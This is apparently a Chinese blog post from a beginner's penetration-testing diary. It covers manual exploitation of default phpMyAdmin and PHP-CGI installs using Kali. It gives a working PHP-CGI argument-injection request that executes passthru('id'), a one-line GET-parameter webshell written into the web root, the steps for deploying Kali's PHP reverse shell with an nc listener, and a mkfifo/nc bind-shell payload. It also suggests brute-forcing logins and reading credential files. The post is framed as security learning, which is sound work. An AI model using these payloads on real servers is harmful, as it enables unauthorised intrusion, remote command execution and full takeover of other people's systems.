小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞

原创 2016年10月21日 18:55:42

手动漏洞挖掘

即扫描后,如何对发现的漏洞告警进行验证。


#默认安装

流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。


漏洞类型--远程命令执行

1、phpMyadmin

安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup。

a.探索PHP网站(可根据banner等信息判断)的phpmyadmin目录是否可以访问(扫描工具/手动爬网)

###有账号密码限制,可尝试爆破###



b.尝试../phpMyAdmin/setup目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】

###安全最佳实践角度:不允许从公网访问phpMyAdmin目录或禁用访问setup目录



c.早期的phpmyadmin有漏洞【可通过在URL地址编辑或者定制发送的指令,使其执行一个PHP页面】

例如:

POST http://192.168.20.10/phpMyAdmin/?-d+allow_url_include%3d1+-d
+auto_prepend_file%3dphp://input HTTP/1.1
                          #修改服务器中的php.ini文件
Host: 192.168.20.10
<?php 
passthru('id');
die();                                              #后面的指令不执行,可屏蔽服务器返回的html代码等杂信息
?>

#编辑一条配置指令来修改php.ini文件,可编写任何功能的PHP页面【可调用系统功能,passthru()】

#可能运行web服务器进程的用户账号会被限制为www-data之类的普通用户账号,则需经过提权,才能完全控制服务器

Burpsuite重放


#已获得www-data用户权限,可进行ls、cat等操作【pwd:查看当前路径;cat etc/password:查看用户账号】


#搜索PHP文件中是否用硬编码的账号密码


#尝试写入网页木马,控制服务器


注:此漏洞有可能不被扫描器扫出来,可自己手工验证


d.网页木马

kali军火库中可以找到现成的网页木马

静态木马webshell,通过浏览器去访问

例如:echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php【最简单的木马】

“\”防止在上传过程中,变量被过滤


在浏览器中执行命令【注:无法直接访问3.php目录,需加问号再执行】



反弹shell【提交一个请求(包含一个反弹shell)】

#账号一般还是会是普通用户【kali中有各种类型的shell】

root@kali:/usr/share/webshells# ls
asp  aspx  cfm  jsp  perl  php
root@kali:/usr/share/webshells# cd php
root@kali:/usr/share/webshells/php# ls
findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
php-backdoor.php  php-reverse-shell.php   simple-backdoor.php
root@kali:/usr/share/webshells/php# cp php-reverse-shell.php /root/3.php
root@kali:/usr/share/webshells/php# 
#修改shell中反弹连接的IP

#使用nc侦听反弹端口1234【nc终端无法使用tab键】


#将shell代码复制粘贴进POST,go发送【此方法相对隐蔽,不易发现】



############################################################################

当一些命令如ifconfig无法使用时


#################################################################################



2、CGI模块【Ubuntu / Debian 默认安装PHP5-CGI】

#可直接访问/cgi-bin/php5和/cgi-bin/php(这两个目录大部分无法爬取)#因为其不在/var/www目录下


#定制编码shellcode




#使服务器打开一个端口,然后再使用nc去连接获得shell

<?php

echo system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');

?>

#若有防火墙,需确定防火墙允许通过






















版权声明:本文为博主原创文章,未经博主允许不得转载。

kali漏洞利用之Metasploit实战

Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启...
  • The__Apollo
  • The__Apollo
  • 2017年04月22日 20:33
  • 4480

Kali渗透测试——利用metasploit攻击靶机WinXP SP1

搭建渗透测试环境Kali攻击机WinXP SP1 靶机启动metasploit跟windows RPC相关的漏洞内部提供的漏洞攻击靶机winxp sp1网络配置查看虚拟机的NAT网段配置WinXP S...
  • Noob_f
  • Noob_f
  • 2017年05月19日 22:40
  • 2239

kali攻防第13章 Metasploit之生成webshell及应用

Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasp...
  • strom2418
  • strom2418
  • 2015年12月24日 12:13
  • 1761

关于Kali的两个Webshell(Webacoo和Weevely)的学习笔记

Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过c...
  • SKI_12
  • SKI_12
  • 2017年03月15日 22:19
  • 1645

通过phpmyadmin各种技巧拿webshell

通过phpmyadmin各种技巧拿webshell
  • HJF007008
  • HJF007008
  • 2016年09月20日 00:15
  • 279

Kali Linux -- Metasploit MSFvenom Generate a Trojan horse and receive a rebound(生成木马和接收反弹)

生成         msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPO...
  • a1092484359
  • a1092484359
  • 2016年12月24日 19:24
  • 489

kali->使用Metaspoit制作木马(无免杀)

首先,我们要先知道木马的使用过程,然后我们才能制作出木马 木马:控制端(我们) 被控制端(倒霉蛋们) 虚拟机的kali 打开终端 使用msfvenom -p命令来制作(因为我用的是kali2.0所以和...
  • Lonelyhat
  • Lonelyhat
  • 2017年07月28日 20:25
  • 951

一次通过漏洞挖掘成功渗透某网站的过程

寻找突破口 对方主站是一个定制开发的CMS,在进行一系列扫描和分析之后,未发现可利用的地方,于是开始分析其二级域名,发现其中某资源管理分站,目标操作系统linux,仅开放HTTP(80端口),整站程...
  • Liuhuaijin
  • Liuhuaijin
  • 2017年09月27日 09:12
  • 489

Web渗透测试之逻辑漏洞挖掘方法

  • 2017年11月02日 11:14
  • 8.41MB
  • 下载

WEB漏洞挖掘技术

前言漏洞挖掘技术一直是网络攻击者最感兴趣的问题,漏洞挖掘的范围也在随着技术的提升而有所变化.在前期针对缓冲区溢出 格式化字符串 堆溢出 lib库溢出等技术都是针对ELF文件(Linux可执行文件)或者...
  • wizardforcel
  • wizardforcel
  • 2016年02月19日 10:09
  • 1487
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
举报原因:
原因补充:

(最多只允许输入30个字)